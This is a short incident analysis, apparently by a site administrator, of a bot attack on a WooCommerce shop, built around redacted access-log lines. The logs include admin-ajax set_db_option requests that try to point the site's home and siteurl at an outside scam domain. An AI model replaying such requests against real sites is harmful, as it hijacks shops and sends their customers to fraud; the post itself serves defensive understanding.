Here’s the deal with this bot attack, reading between the lines and using log files to help:
1. The bot tries to take exploit several vulnerabilities that have been out there in the wild and may affect specific plugins or versions of WordPress. This is clearly in an attempt to avoid using other means.
2. It then grabs a copy of the homepage, parses it, and finds the first product ID it can get its hands on.
3. It then goes to the cart, and then to the checkout.
54.39.175.230 https://www.REDCATED.co.uk – [02/Nov/2020:09:26:52 +0000] “POST /?add-to-cart=6748 HTTP/1.0” 302 0 “https://www.REDACTED.co.uk/?add-to-cart=6748” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:52 +0000] “GET /cart HTTP/1.0” 200 32314 “https://www.REDACTED.co.uk/?add-to-cart=6748” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:53 +0000] “POST /checkout HTTP/1.0” 200 35936 “https://www.REDACTED.co.uk/checkout” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
4. Now on the checkout, it’s likely making a note of the wp_woocommerce_session_XXXXX
cookie value that gets generated in the browser, it can use this to continue the session in the next step.
5. A custom HTTP script written in the Go language (popular with black and white/grey hat hackers) is then hitting the checkout; this is clear from the user-agent and the fact there is no HTTP referrer e.g.
54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:56 +0000] “POST /checkout HTTP/1.0” 200 36638 “-” “Go-http-client/1.1”
6. That script is creating the order, and is also likely to be exploiting whatever vulnerabilty is available to bypass customer account settings and create a new user; it may or may not be relying upon other exploits for this.
7. Assuming it has successfully gained access to the system, it then tries to update the DB
54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:58 +0000] “POST /wp-admin/admin-ajax.php?action=set_db_option&option_name=home&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n362 HTTP/1.0” 400 1 “https://www.REDACTED.co.uk/wp-admin/admin-ajax.php?action=set_db_option&option_name=home&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n362” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:59 +0000] “POST /wp-admin/admin-ajax.php?action=set_db_option&option_name=siteurl&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n324 HTTP/1.0” 400 1 “https://www.REDACTED.co.uk/wp-admin/admin-ajax.php?action=set_db_option&option_name=siteurl&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n324” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:27:00 +0000] “POST /wp-admin/profile.php?wc-ajax=1 HTTP/1.0” 500 178 “https://www.REDACTED.co.uk/wp-admin/profile.php?wc-ajax=1” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
8. It either fails and leaves you with nuisance orders, or succeeds and points your site to the scam URL.